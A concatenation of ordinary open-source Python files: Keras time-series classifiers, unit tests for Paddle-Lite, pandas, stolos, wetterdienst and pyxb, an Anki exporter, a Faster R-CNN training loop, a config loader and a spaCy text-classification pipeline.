elif model_name == "blstm2":
model = blstm2(input_shape, nb_class)
elif model_name == "lstmfcn":
model = lstm_fcn(input_shape, nb_class)
elif model_name == "resnet":
model = cnn_resnet(input_shape, nb_class)
elif model_name == "mlp":
model = mlp4(input_shape, nb_class)
elif model_name == "lenet":
model = cnn_lenet(input_shape, nb_class)
else:
print("model name missing")
return model
def mlp4(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, "Time Series Classification from Scratch with Deep Neural Networks: A Strong Baseline," Int. Joint Conf. Neural Networks, 2017, pp. 1578-1585
ip = Input(shape=input_shape)
fc = Flatten()(ip)
fc = Dropout(0.1)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.2)(fc)
fc = Dense(500, activation='relu')(fc)
fc = Dropout(0.3)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_lenet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “Gradient-based learning applied to document recognition,” Proceedings of the IEEE, vol. 86, no. 11, pp. 2278–2324, 1998.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
conv = Conv1D(6+10*i, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(120, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(84, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def cnn_vgg(input_shape, nb_class):
# <NAME> and <NAME>, "Very deep convolutional networks for large-scale image recognition," arXiv preprint arXiv:1409.1556, 2014.
ip = Input(shape=input_shape)
conv = ip
nb_cnn = int(round(math.log(input_shape[0], 2))-3)
print("pooling layers: %d"%nb_cnn)
for i in range(nb_cnn):
num_filters = min(64*2**i, 512)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
if i > 1:
conv = Conv1D(num_filters, 3, padding='same', activation="relu", kernel_initializer='he_uniform')(conv)
conv = MaxPooling1D(pool_size=2)(conv)
flat = Flatten()(conv)
fc = Dense(4096, activation='relu')(flat)
fc = Dropout(0.5)(fc)
fc = Dense(4096, activation='relu')(fc)
fc = Dropout(0.5)(fc)
out = Dense(nb_class, activation='softmax')(fc)
model = Model([ip], [out])
model.summary()
return model
def lstm1v0(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
ip = Input(shape=input_shape)
l2 = LSTM(512)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Long Short-Term Memory,” Neural Computation, vol. 9, no. 8, pp. 1735–1780, Nov. 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = LSTM(100)(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = LSTM(100, return_sequences=True)(ip)
l2 = LSTM(100)(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm1(input_shape, nb_class):
# Original proposal:
# <NAME> and <NAME>, “Bidirectional recurrent neural networks,” IEEE Transactions on Signal Processing, vol. 45, no. 11, pp. 2673–2681, 1997.
# Hyperparameter choices:
# <NAME> and <NAME>, "Optimal hyperparameters for deep lstm-networks for sequence labeling tasks," arXiv, preprint arXiv:1707.06799, 2017
ip = Input(shape=input_shape)
l2 = Bidirectional(LSTM(100))(ip)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def blstm2(input_shape, nb_class):
ip = Input(shape=input_shape)
l1 = Bidirectional(LSTM(100, return_sequences=True))(ip)
l2 = Bidirectional(LSTM(100))(l1)
out = Dense(nb_class, activation='softmax')(l2)
model = Model([ip], [out])
model.summary()
return model
def lstm_fcn(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, and <NAME>, “LSTM Fully Convolutional Networks for Time Series Classification,” IEEE Access, vol. 6, pp. 1662–1669, 2018.
ip = Input(shape=input_shape)
# lstm part is a 1 time step multivariate as described in Karim et al. Seems strange, but works I guess.
lstm = Permute((2, 1))(ip)
lstm = LSTM(128)(lstm)
lstm = Dropout(0.8)(lstm)
conv = Conv1D(128, 8, padding='same', kernel_initializer='he_uniform')(ip)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
flat = GlobalAveragePooling1D()(conv)
flat = concatenate([lstm, flat])
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model
def cnn_resnet(input_shape, nb_class):
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, "Data augmentation using synthetic data for time series classification with deep residual networks," International Workshop on Advanced Analytics and Learning on Temporal Data ECML/PKDD, 2018
ip = Input(shape=input_shape)
residual = ip
conv = ip
for i, nb_nodes in enumerate([64, 128, 128]):
conv = Conv1D(nb_nodes, 8, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 5, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
conv = Conv1D(nb_nodes, 3, padding='same', kernel_initializer="glorot_uniform")(conv)
conv = BatchNormalization()(conv)
conv = Activation('relu')(conv)
if i < 2:
# expands dimensions according to Fawaz et al.
residual = Conv1D(nb_nodes, 1, padding='same', kernel_initializer="glorot_uniform")(residual)
residual = BatchNormalization()(residual)
conv = add([residual, conv])
conv = Activation('relu')(conv)
residual = conv
flat = GlobalAveragePooling1D()(conv)
out = Dense(nb_class, activation='softmax')(flat)
model = Model([ip], [out])
model.summary()
return model |
lite/tests/unittest_py/pass/test_conv_elementwise_fuser_pass.py | 714627034/Paddle-Lite | 808 | 16600 | <filename>lite/tests/unittest_py/pass/test_conv_elementwise_fuser_pass.py
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
sys.path.append('.')
from auto_scan_test import FusePassAutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
from test_conv_util import UpdatePaddingAndDilation, ConvOutputSize, ConvTransposeOutputSize
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
class TestConvElementwiseFuse(FusePassAutoScanTest):
def __init__(self, *args, **kwargs):
FusePassAutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(
TargetType.ARM, [PrecisionType.FP32],
DataLayoutType.NCHW,
thread=[1, 4])
self.enable_testing_on_place(
TargetType.X86, [PrecisionType.FP32],
DataLayoutType.NCHW,
thread=[1, 4])
opencl_places = [
Place(TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.FP32, DataLayoutType.NCHW),
Place(TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.Any, DataLayoutType.NCHW),
Place(TargetType.Host, PrecisionType.FP32)
]
self.enable_testing_on_place(places=opencl_places)
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
#conv or conv_transpose
Transpose = draw(st.sampled_from([True, False]))
#conv param or conv_transpose param
in_shape = draw(
st.lists(
st.integers(
min_value=3, max_value=128),
min_size=3,
max_size=3))
in_shape = [draw(st.integers(min_value=1, max_value=4))] + in_shape
weight_shape = draw(
st.lists(
st.integers(
min_value=1, max_value=8), min_size=4, max_size=4))
paddings = draw(
st.lists(
st.integers(
min_value=0, max_value=2), min_size=2, max_size=2))
dilations = draw(st.sampled_from([[2, 2]]))
groups = draw(st.sampled_from([1, 2, in_shape[1]]))
padding_algorithm = draw(st.sampled_from(["VALID", "SAME"]))
strides = draw(st.sampled_from([[1, 1], [2, 2]]))
output_padding = draw(
st.sampled_from([[], [
draw(
st.integers(
min_value=0,
max_value=max(strides[0], dilations[0]) - 1)), draw(
st.integers(
min_value=0,
max_value=max(strides[1], dilations[1]) - 1))
]]))
scale_in = draw(st.floats(min_value=0.001, max_value=0.1))
scale_out = draw(st.floats(min_value=0.001, max_value=0.1))
if Transpose:
bias_sample_shape = weight_shape[1] * groups
else:
bias_sample_shape = weight_shape[0]
elementwise_bias_shape = [bias_sample_shape]
conv_out_shape = []
paddings_, dilations_ = UpdatePaddingAndDilation(
in_shape, weight_shape, paddings, dilations, groups,
padding_algorithm, strides)
if Transpose:
assume(in_shape[1] == weight_shape[0])
assume(in_shape[1] % groups == 0) #TODO
if len(output_padding):
assume(output_padding[0] < max(strides[0], dilations_[0]))
assume(output_padding[1] < max(strides[1], dilations_[1]))
conv_out_shape = [in_shape[0], weight_shape[1] * groups]
oh, ow = ConvTransposeOutputSize(in_shape, weight_shape,
dilations_, paddings_, strides)
if len(output_padding):
oh = oh + output_padding[0]
ow = ow + output_padding[1]
conv_out_shape = conv_out_shape + [int(oh), int(ow)]
assume(oh > 0 and ow > 0)
if len(output_padding):
conv_output_h = (oh + output_padding[0] + paddings[0] +
paddings[1] -
(dilations[0] *
(weight_shape[2] - 1) + 1)) / strides[0] + 1
conv_output_w = (oh + output_padding[1] + paddings[0] +
paddings[1] -
(dilations[1] *
(weight_shape[3] - 1) + 1)) / strides[1] + 1
assume(in_shape[2] == (int)(conv_output_h))
assume(in_shape[3] == (int)(conv_output_w))
else:
assume(in_shape[1] == weight_shape[1] * groups)
assume(weight_shape[0] % groups == 0)
conv_out_shape = [in_shape[0], weight_shape[0]]
oh, ow = ConvOutputSize(in_shape, weight_shape, dilations_,
paddings_, strides)
conv_out_shape = conv_out_shape + [int(oh), int(ow)]
assume(oh > 0 and ow > 0)
conv_type = ""
conv_attrs = {}
if Transpose:
conv_type = "conv2d_transpose"
conv_attrs = {
"data_format": 'nchw',
"dilations": dilations,
"padding_algorithm": padding_algorithm,
"groups": groups,
"paddings": paddings,
"strides": strides,
"Scale_in": scale_in,
"Scale_out": scale_out,
"output_size": [],
"output_padding": output_padding
}
else:
conv_type = "conv2d"
conv_attrs = {
"data_format": 'nchw',
"dilations": dilations,
"padding_algorithm": padding_algorithm,
"groups": groups,
"paddings": paddings,
"strides": strides,
"Scale_in": scale_in,
"Scale_out": scale_out
}
conv_op = OpConfig(
type=conv_type,
inputs={"Input": ["input_data"],
"Filter": ["filter_data"]},
outputs={"Output": ["conv_output_data"]},
attrs=conv_attrs)
elementwise_add_op = OpConfig(
type="elementwise_add",
inputs={"X": ["conv_output_data"],
"Y": ["add_bias_data"]},
outputs={"Out": ["output_data"]},
attrs={"axis": 1})
ops = [conv_op, elementwise_add_op]
self.ops = ops
program_config = ProgramConfig(
ops=ops,
weights={
"filter_data": TensorConfig(shape=weight_shape),
"add_bias_data": TensorConfig(shape=elementwise_bias_shape)
},
inputs={"input_data": TensorConfig(shape=in_shape)},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
config = CxxConfig()
return self.get_predictor_configs(), [self.ops[0].type], (1e-4, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(
quant=False,
max_examples=500,
passes=["lite_conv_elementwise_fuser_pass"])
if __name__ == "__main__":
unittest.main(argv=[''])
|
.venv/lib/python3.8/site-packages/pandas/tests/indexes/timedeltas/test_shift.py | acrucetta/Chicago_COVI_WebApp | 115 | 16627 | import pytest
from pandas.errors import NullFrequencyError
import pandas as pd
from pandas import TimedeltaIndex
import pandas._testing as tm
class TestTimedeltaIndexShift:
# -------------------------------------------------------------
# TimedeltaIndex.shift is used by __add__/__sub__
def test_tdi_shift_empty(self):
# GH#9903
idx = pd.TimedeltaIndex([], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
tm.assert_index_equal(idx.shift(3, freq="H"), idx)
def test_tdi_shift_hours(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="H"), idx)
exp = pd.TimedeltaIndex(["8 hours", "9 hours", "12 hours"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="H"), exp)
exp = pd.TimedeltaIndex(["2 hours", "3 hours", "6 hours"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="H"), exp)
def test_tdi_shift_minutes(self):
# GH#9903
idx = pd.TimedeltaIndex(["5 hours", "6 hours", "9 hours"], name="xxx")
tm.assert_index_equal(idx.shift(0, freq="T"), idx)
exp = pd.TimedeltaIndex(["05:03:00", "06:03:00", "9:03:00"], name="xxx")
tm.assert_index_equal(idx.shift(3, freq="T"), exp)
exp = pd.TimedeltaIndex(["04:57:00", "05:57:00", "8:57:00"], name="xxx")
tm.assert_index_equal(idx.shift(-3, freq="T"), exp)
def test_tdi_shift_int(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(1)
expected = TimedeltaIndex(
[
"1 days 01:00:00",
"2 days 01:00:00",
"3 days 01:00:00",
"4 days 01:00:00",
"5 days 01:00:00",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_tdi_shift_nonstandard_freq(self):
# GH#8083
tdi = pd.to_timedelta(range(5), unit="d")
trange = tdi._with_freq("infer") + pd.offsets.Hour(1)
result = trange.shift(3, freq="2D 1s")
expected = TimedeltaIndex(
[
"6 days 01:00:03",
"7 days 01:00:03",
"8 days 01:00:03",
"9 days 01:00:03",
"10 days 01:00:03",
],
freq="D",
)
tm.assert_index_equal(result, expected)
def test_shift_no_freq(self):
# GH#19147
tdi = TimedeltaIndex(["1 days 01:00:00", "2 days 01:00:00"], freq=None)
with pytest.raises(NullFrequencyError, match="Cannot shift with no freq"):
tdi.shift(2)
|
stolos/tests/test_bin.py | sailthru/stolos | 121 | 16629 | import os
from subprocess import check_output, CalledProcessError
from nose import tools as nt
from stolos import queue_backend as qb
from stolos.testing_tools import (
with_setup, validate_zero_queued_task, validate_one_queued_task,
validate_n_queued_task
)
def run(cmd, tasks_json_tmpfile, **kwargs):
cmd = (
"set -o pipefail ; STOLOS_TASKS_JSON={tasks_json} {cmd}").format(
cmd=cmd, tasks_json=tasks_json_tmpfile, **kwargs)
rv = check_output(cmd, shell=True, executable="bash", env=os.environ)
return rv
@with_setup
def test_stolos_submit(app1, job_id1, tasks_json_tmpfile):
with nt.assert_raises(CalledProcessError):
run("stolos-submit -h", tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
run("stolos-submit -a %s -j %s" % (app1, job_id1), tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_readd(app1, job_id1, tasks_json_tmpfile):
qb.set_state(app1, job_id1, failed=True)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s" % (app1, job_id1),
tasks_json_tmpfile)
validate_zero_queued_task(app1)
run("stolos-submit -a %s -j %s --readd" % (app1, job_id1),
tasks_json_tmpfile)
validate_one_queued_task(app1, job_id1)
@with_setup
def test_stolos_submit_multiple_jobs(app1, app2, job_id1, job_id2,
tasks_json_tmpfile):
validate_zero_queued_task(app1)
validate_zero_queued_task(app2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
run("stolos-submit -a %s %s -j %s %s" % (app1, app2, job_id1, job_id2),
tasks_json_tmpfile)
validate_n_queued_task(app1, job_id1, job_id2)
validate_n_queued_task(app2, job_id1, job_id2)
|
tests/test_api.py | bh-chaker/wetterdienst | 155 | 16631 | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
import pytest
from wetterdienst import Wetterdienst
@pytest.mark.remote
@pytest.mark.parametrize(
"provider,kind,kwargs",
[
# German Weather Service (DWD)
(
"dwd",
"observation",
{"parameter": "kl", "resolution": "daily", "period": "recent"},
),
("dwd", "forecast", {"parameter": "large", "mosmix_type": "large"}),
# Environment and Climate Change Canada
("eccc", "observation", {"parameter": "daily", "resolution": "daily"}),
],
)
@pytest.mark.parametrize("si_units", (False, True))
def test_api(provider, kind, kwargs, si_units):
""" Test main wetterdienst API """
# Build API
api = Wetterdienst(provider, kind)
# Discover parameters
assert api.discover()
# All stations
request = api(**kwargs, si_units=si_units).all()
stations = request.df
# Check stations DataFrame columns
assert set(stations.columns).issuperset(
{
"station_id",
"from_date",
"to_date",
"height",
"latitude",
"longitude",
"name",
"state",
}
)
# Check that there are actually stations
assert not stations.empty
# Query first DataFrame from values
values = next(request.values.query()).df
# TODO: DWD Forecast has no quality
assert set(values.columns).issuperset(
{"station_id", "parameter", "date", "value", "quality"}
)
assert not values.empty
|
crowd_anki/export/anki_exporter_wrapper.py | katrinleinweber/CrowdAnki | 391 | 16633 | from pathlib import Path
from .anki_exporter import AnkiJsonExporter
from ..anki.adapters.anki_deck import AnkiDeck
from ..config.config_settings import ConfigSettings
from ..utils import constants
from ..utils.notifier import AnkiModalNotifier, Notifier
from ..utils.disambiguate_uuids import disambiguate_note_model_uuids
EXPORT_FAILED_TITLE = "Export failed"
class AnkiJsonExporterWrapper:
"""
Wrapper designed to work with standard export dialog in anki.
"""
key = "CrowdAnki JSON representation"
ext = constants.ANKI_EXPORT_EXTENSION
hideTags = True
includeTags = True
directory_export = True
def __init__(self, collection,
deck_id: int = None,
json_exporter: AnkiJsonExporter = None,
notifier: Notifier = None):
self.includeMedia = True
self.did = deck_id
self.count = 0 # Todo?
self.collection = collection
self.anki_json_exporter = json_exporter or AnkiJsonExporter(collection, ConfigSettings.get_instance())
self.notifier = notifier or AnkiModalNotifier()
# required by anki exporting interface with its non-PEP-8 names
# noinspection PyPep8Naming
def exportInto(self, directory_path):
if self.did is None:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki export works only for specific decks. "
"Please use CrowdAnki snapshot if you want to export "
"the whole collection.")
return
deck = AnkiDeck(self.collection.decks.get(self.did, default=False))
if deck.is_dynamic:
self.notifier.warning(EXPORT_FAILED_TITLE, "CrowdAnki does not support export for dynamic decks.")
return
# Clean up duplicate note models. See
# https://github.com/Stvad/CrowdAnki/wiki/Workarounds-%E2%80%94-Duplicate-note-model-uuids.
disambiguate_note_model_uuids(self.collection)
# .parent because we receive name with random numbers at the end (hacking around internals of Anki) :(
export_path = Path(directory_path).parent
self.anki_json_exporter.export_to_directory(deck, export_path, self.includeMedia,
create_deck_subdirectory=ConfigSettings.get_instance().export_create_deck_subdirectory)
self.count = self.anki_json_exporter.last_exported_count
def get_exporter_id(exporter):
return f"{exporter.key} (*{exporter.ext})", exporter
def exporters_hook(exporters_list):
exporter_id = get_exporter_id(AnkiJsonExporterWrapper)
if exporter_id not in exporters_list:
exporters_list.append(exporter_id)
|
tests/bugs/test-200908181430.py | eLBati/pyxb | 123 | 16684 | # -*- coding: utf-8 -*-
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.binding.datatypes as xs
import pyxb.binding.basis
import pyxb.utils.domutils
import os.path
xsd='''<?xml version="1.0" encoding="UTF-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:simpleType name="foo"/>
</xs:schema>'''
from pyxb.exceptions_ import *
import unittest
class TestTrac_200908181430 (unittest.TestCase):
def testParsing (self):
self.assertRaises(pyxb.SchemaValidationError, pyxb.binding.generate.GeneratePython, schema_text=xsd)
if __name__ == '__main__':
unittest.main()
|
utils/utils_fit.py | bubbliiiing/faster-rcnn-keras | 282 | 16719 | import numpy as np
import tensorflow as tf
from keras import backend as K
from tqdm import tqdm
def write_log(callback, names, logs, batch_no):
for name, value in zip(names, logs):
summary = tf.Summary()
summary_value = summary.value.add()
summary_value.simple_value = value
summary_value.tag = name
callback.writer.add_summary(summary, batch_no)
callback.writer.flush()
def fit_one_epoch(model_rpn, model_all, loss_history, callback, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, anchors, bbox_util, roi_helper):
total_loss = 0
rpn_loc_loss = 0
rpn_cls_loss = 0
roi_loc_loss = 0
roi_cls_loss = 0
val_loss = 0
with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen):
if iteration >= epoch_step:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.train_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
write_log(callback, ['total_loss','rpn_cls_loss', 'rpn_reg_loss', 'detection_cls_loss', 'detection_reg_loss'], loss_class, iteration)
rpn_cls_loss += loss_class[1]
rpn_loc_loss += loss_class[2]
roi_cls_loss += loss_class[3]
roi_loc_loss += loss_class[4]
total_loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss
pbar.set_postfix(**{'total' : total_loss / (iteration + 1),
'rpn_cls' : rpn_cls_loss / (iteration + 1),
'rpn_loc' : rpn_loc_loss / (iteration + 1),
'roi_cls' : roi_cls_loss / (iteration + 1),
'roi_loc' : roi_loc_loss / (iteration + 1),
'lr' : K.get_value(model_rpn.optimizer.lr)})
pbar.update(1)
print('Start Validation')
with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen_val):
if iteration >= epoch_step_val:
break
X, Y, boxes = batch[0], batch[1], batch[2]
P_rpn = model_rpn.predict_on_batch(X)
results = bbox_util.detection_out_rpn(P_rpn, anchors)
roi_inputs = []
out_classes = []
out_regrs = []
for i in range(len(X)):
R = results[i]
X2, Y1, Y2 = roi_helper.calc_iou(R, boxes[i])
roi_inputs.append(X2)
out_classes.append(Y1)
out_regrs.append(Y2)
loss_class = model_all.test_on_batch([X, np.array(roi_inputs)], [Y[0], Y[1], np.array(out_classes), np.array(out_regrs)])
val_loss += loss_class[0]
pbar.set_postfix(**{'total' : val_loss / (iteration + 1)})
pbar.update(1)
logs = {'loss': total_loss / epoch_step, 'val_loss': val_loss / epoch_step_val}
loss_history.on_epoch_end([], logs)
print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
print('Total Loss: %.3f || Val Loss: %.3f ' % (total_loss / epoch_step, val_loss / epoch_step_val))
model_all.save_weights('logs/ep%03d-loss%.3f-val_loss%.3f.h5' % (epoch + 1, total_loss / epoch_step, val_loss / epoch_step_val))
|
tools/pot/openvino/tools/pot/graph/gpu_patterns.py | ryanloney/openvino-1 | 1,127 | 16735 | # Copyright (C) 2020-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from .pattern_utils import check_fused_scale_shift_patterns, get_fused_scale_shift_patterns, \
check_fused_op_const_patterns, get_fused_op_const_pattern, get_clamp_mult_const_pattern
def get_gpu_ignored_patterns():
return {
'blocks': [(pattern, check_fused_scale_shift_patterns) for pattern in get_fused_scale_shift_patterns()] +
[(pattern, check_fused_op_const_patterns) for pattern in get_fused_op_const_pattern()],
'activations': [get_clamp_mult_const_pattern()],
'inputs': []
}
|
genrl/environments/vec_env/utils.py | matrig/genrl | 390 | 16756 | from typing import Tuple
import torch
class RunningMeanStd:
"""
    Utility class that keeps a running estimate of the mean and variance of a data stream
:param epsilon: Small number to prevent division by zero for calculations
:param shape: Shape of the RMS object
:type epsilon: float
:type shape: Tuple
"""
def __init__(self, epsilon: float = 1e-4, shape: Tuple = ()):
self.mean = torch.zeros(shape).double()
self.var = torch.ones(shape).double()
self.count = epsilon
def update(self, batch: torch.Tensor):
batch_mean = torch.mean(batch, axis=0)
batch_var = torch.var(batch, axis=0)
batch_count = batch.shape[0]
total_count = self.count + batch_count
delta = batch_mean - self.mean
new_mean = self.mean + delta * batch_count / total_count
M2 = (
self.var * self.count
+ batch_var * batch_count
+ (delta ** 2) * self.count * batch_count / total_count
)
self.mean = new_mean
self.var = M2 / (total_count - 1)
self.count = total_count
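

# --- Usage sketch (added for illustration; not part of the original module). ---
# Streaming two batches should track the statistics of the concatenated data;
# exact agreement is not expected because of the epsilon initialisation and the
# unbiased per-batch variance used in the update.
if __name__ == "__main__":
    rms = RunningMeanStd(shape=(3,))
    batch_a = torch.randn(64, 3).double()
    batch_b = torch.randn(32, 3).double()
    rms.update(batch_a)
    rms.update(batch_b)
    full = torch.cat([batch_a, batch_b], dim=0)
    print(rms.mean, torch.mean(full, axis=0))
    print(rms.var, torch.var(full, axis=0))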
|
cointrader/config.py | 3con/cointrader | 103 | 16786 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import logging
import logging.config
if (sys.version_info > (3, 0)):
# Python 3 code in this block
import configparser
else:
# Python 2 code in this block
import ConfigParser as configparser
DEFAULT_CONFIG = ".cointrader.ini"
def get_path_to_config():
env = os.getenv("HOME")
return os.path.join(env, DEFAULT_CONFIG)
class Config(object):
def __init__(self, configfile=None):
self.verbose = False
self.market = "poloniex"
self.api_key = None
self.api_secret = None
if configfile:
logging.config.fileConfig(configfile.name)
config = configparser.ConfigParser()
config.readfp(configfile)
exchange = config.get("DEFAULT", "exchange")
self.api_key = config.get(exchange, "api_key")
self.api_secret = config.get(exchange, "api_secret")
@property
def api(self):
if not self.api_key or not self.api_secret:
raise RuntimeError("API not configured")
return self.api_key, self.api_secret
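

# --- Usage sketch (added for illustration; not part of the original module). ---
# Without a config file the exchange credentials stay unset, so reading
# ``config.api`` raises; pointing it at an ini file (see DEFAULT_CONFIG, a
# POSIX-style $HOME is assumed) returns the key/secret pair instead.
if __name__ == "__main__":
    config = Config()
    print(config.market, get_path_to_config())
    try:
        config.api  # property access triggers the RuntimeError below
    except RuntimeError as exc:
        print(exc)  # "API not configured"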
|
api-inference-community/docker_images/spacy/app/pipelines/text_classification.py | mlonaws/huggingface_hub | 362 | 16792 | <filename>api-inference-community/docker_images/spacy/app/pipelines/text_classification.py<gh_stars>100-1000
import os
import subprocess
import sys
from typing import Dict, List
from app.pipelines import Pipeline
class TextClassificationPipeline(Pipeline):
def __init__(
self,
model_id: str,
):
# At the time, only public models from spaCy are allowed in the inference API.
full_model_path = model_id.split("/")
if len(full_model_path) != 2:
raise ValueError(
f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)"
)
namespace, model_name = full_model_path
package = f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl"
cache_dir = os.environ["PIP_CACHE"]
subprocess.check_call(
[sys.executable, "-m", "pip", "install", "--cache-dir", cache_dir, package]
)
import spacy
self.model = spacy.load(model_name)
def __call__(self, inputs: str) -> List[List[Dict[str, float]]]:
"""
Args:
inputs (:obj:`str`):
a string containing some text
Return:
            A :obj:`list`. The object returned should be a list of one list like [[{"label": "POSITIVE", "score": 0.9939950108528137}]] containing:
- "label": A string representing what the label/class is. There can be multiple labels.
- "score": A score between 0 and 1 describing how confident the model is for this label/class.
"""
doc = self.model(inputs)
categories = []
for cat, score in doc.cats.items():
categories.append({"label": cat, "score": score})
return [categories]
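

# --- Usage sketch (added for illustration; the model id below is hypothetical). ---
# __init__ pip-installs the packaged pipeline wheel from the Hugging Face Hub,
# so this needs network access, a PIP_CACHE environment variable and a real
# namespace/model_name that ships a spaCy textcat component.
if __name__ == "__main__":
    os.environ.setdefault("PIP_CACHE", "/tmp/pip-cache")
    pipeline = TextClassificationPipeline("spacy/en_textcat_demo")  # hypothetical model id
    print(pipeline("I really enjoyed this movie."))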
|
aws/logs_monitoring/tests/test_cloudtrail_s3.py | rkitron/datadog-serverless-functions | 232 | 16793 | <filename>aws/logs_monitoring/tests/test_cloudtrail_s3.py
